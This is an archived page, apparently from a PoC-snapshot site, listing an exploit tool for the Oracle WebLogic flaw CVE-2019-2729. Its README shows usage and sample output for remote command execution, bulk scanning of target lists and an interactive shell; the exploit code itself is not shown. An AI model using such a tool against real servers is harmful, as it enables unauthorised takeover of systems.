Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-2729 PoC — Oracle Fusion Middleware WebLogic Server组件访问控制错误漏洞

Source
Associated Vulnerability
Title:Oracle Fusion Middleware WebLogic Server组件访问控制错误漏洞 (CVE-2019-2729)
Description:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle Fusion Middleware中的WebLogic Server组件10.3.6.0.0版本、12.1.3.0.0版本和12.2.1.3.0版本的Web Services子组件存在访问控制错误漏洞。攻击者可利用该漏洞控制组件,影响数据的保密性和可用性。
Description
PoC for exploiting CVE-2019-2729 on WebLogic
Readme
# CVE-2019-2729 - creal

PoC for exploiting CVE-2019-2729 on WebLogic

### Exploit Usage

```
python3 creal.py -h
usage: creal.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url
  -f F, --file F        url file
  -c CMD, --command CMD
                        command
  -s SH, --shell SH     url to connect
  ```
  

#### Exploit single target:
```
$ python3 creal.py -u http://IP:PORT -c id

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx

uid=500(UID) gid=500(GID) groups=500(GROUP)
```



#### Exploit url list
```
$ python3 creal.py -f list.txt -c id

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx

uid=500(UID) gid=500(GID) groups=500(GROUP)

[-] NOT VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
[!] There was an error connecting!

--------------------------
Vulnerable targets scanned:
[+] http://xxx.xxx.xxx.xxx:xxxx
```



#### Interactive shell
```
$ python3 creal.py -s http://IP:PORT

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

Welcome to the interactive shell for: http://xxx.xxx.xxx.xxx:xxxx
User: USER

> id
uid=500(UID) gid=500(GID) groups=500(GROUP)

> whoami
USER

> which nc
/usr/bin/nc
```
File Snapshot

[4.0K] /data/pocs/2dde2a3c4a0ef0c6b884dea7e65fc4a7a4b915f8 ├── [1.3M] creal.py └── [1.6K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.